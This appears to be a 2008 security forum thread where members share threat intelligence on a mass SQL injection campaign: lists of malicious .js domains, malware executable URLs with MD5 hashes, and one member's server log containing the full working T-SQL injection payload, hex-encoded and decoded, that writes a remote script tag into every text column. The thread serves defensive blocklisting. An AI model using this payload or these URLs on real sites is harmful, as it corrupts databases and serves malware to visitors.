SQL Injected jscript sites

[YanceySlide]

New danmec:
www.adwbn.ru

[JohnC]

Thanks.

[pcaccent]

<script src=hxxp://stoe.co.kr/img/btn/1.js></script>

<script src=hxxp://www.attadd.com/ngg.js></script>
<script src=hxxp://www.brcporb.ru/ngg.js></script>
<script src=hxxp://www.gb53.ru/ngg.js></script>
<script src=hxxp://www.korfd.ru/ngg.js></script>
<script src=hxxp://www.h23f.ru/ngg.js></script>
<script src=hxxp://www.lkc2.ru/ngg.js></script>

[Orac]

Code: [Select]

<script src="http://1.verynx.cn/w.js"></script>

[sowhat-x]

hxxp://www.jvke.ru/ngg.js
hxxp://www.ecx2.ru/ngg.js
Pointing to:
hxxp://nudk.ru/cgi-bin/index.cgi?ad

hxxp://www.jex5.ru/ngg.js
Pointing to:
hxxp://gb53.ru/cgi-bin/index.cgi?ad

hxxp://www.5kc3.ru/ngg.js
hxxp://www.4cnw.ru/ngg.js
hxxp://www.keje.ru/ngg.js
hxxp://www.d5sg.ru/ngg.js
hxxp://www.90mc.ru/ngg.js
Pointing to:
hxxp://4cnw.ru/cgi-bin/index.cgi?ad

hxxp://www.btoperc.ru/ngg.js
hxxp://www.grtsel.ru/ngg.js
Pointing to:
hxxp://h23f.ru/cgi-bin/index.cgi?ad

hxxp://www.o1o2qq.cn/ri.js

[sowhat-x]

hxxp://www.keec.ru/ngg.js
Pointing to:
hxxp://keje.ru/cgi-bin/index.cgi?ad

hxxp://www.9jsr.ru/ngg.js
Pointing to:
hxxp://5kc3.ru/cgi-bin/index.cgi?ad

[JohnC]

Thank you.

[pcaccent]

<script src=hxxp://www.4vrs.ru/ngg.js></script>
<script src=hxxp://www.bts5.ru/ngg.js></script>
<script src=hxxp://www.cgt4.ru/ngg.js></script>
<script src=hxxp://www.chds.ru/ngg.js></script>
<script src=hxxp://www.cvsr.ru/ngg.js></script>
<script src=hxxp://www.kgj3.ru/ngg.js></script>
<script src=hxxp://www.lksr.ru/ngg.js></script>
<script src=hxxp://abc.verynx.cn/w.js></script>

[Orac]

Code: [Select]

<script src="http://abc.verynx.cn/w.js">
<script src="http://1.verynx.cn/w.js">
<script src="http://xunlei.verynx.cn/w.js">


[JohnC]

Thanks.

[sowhat-x]

hxxp://jjmaobuduo.3322.org/csrss/w.js
hxxp://jjmaoduo.3322.org/csrss/w.js
hxxp://www.8hcs.ru/js.js
hxxp://www.98hs.ru/js.js
hxxp://www.bgsr.ru/js.js
hxxp://www.bywd.ru/js.js
hxxp://www.ibse.ru/js.js
hxxp://www.ncbw.ru/js.js
hxxp://www.nwj4.ru/js.js
hxxp://www.ojns.ru/js.js
hxxp://www.porv.ru/js.js
hxxp://www.uhwc.ru/js.js

"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):

hxxp://www.plgou.com/csrss/rondll32.exe

And also...

hxxp://91.203.93.4/cgi-bin/index.cgi?ad

[Serg]

===
"Main" malware executable that gets dropped from some of the above...
(MD5 -> 68ba2b52c10841ea3d3e5d0982f647d8):
===

fukc... what is it? i've never seen that. Chines baidu.com, .ru sites and rootkits + unreachable admin page on 246.114.180.29:7854.... 
pls add this admin page

Code: [Select]

http://www.plgou.com/csrss/ack.html
and trojans from that

Code: [Select]

http://www.plgou.com/comine/sss.exe
http://www.plgou.com/comine/beauty.exe
http://www.plgou.com/comine/sl.exe
http://www.plgou.com/comine/server.exe


[sowhat-x]

Regarding the dropped rondll32.exe above...
http://s3cwatch.wordpress.com/2008/08/06/

Didn't really bothered digging more on the dropped exes to be honest,
spent more time trying to dig newer "injection" domains per se...

Edit:Thought i should add the hashes from the rest of .exes as well...

846790691B6F9717B9A1BF68E0BCD6E5 -> sss.exe
C1D6F2020EA16FA73CF70F522A7ECFD6 -> beauty.exe
82686A1AB42882AE0E40B863E79E6E33  -> sl.exe
526FEEE3909E18DB7D8AA567019B7C2C -> server.exe

[Orac]

One from todays logs on one of our servers

Log entry, IP address obfuscated for privacy.

Code: [Select]

xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

Decoded, IP address obfuscated for privacy.

Code: [Select]

xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

The link is returning a 500 Internal server error.

In all we have seen this same sql injection attempt from 35 indivdual IPs today.

[pcaccent]

also downloaded.

hxxp://www.plgou.com/comine/new2.exe
hxxp://www.plgou.com/comine/b.exe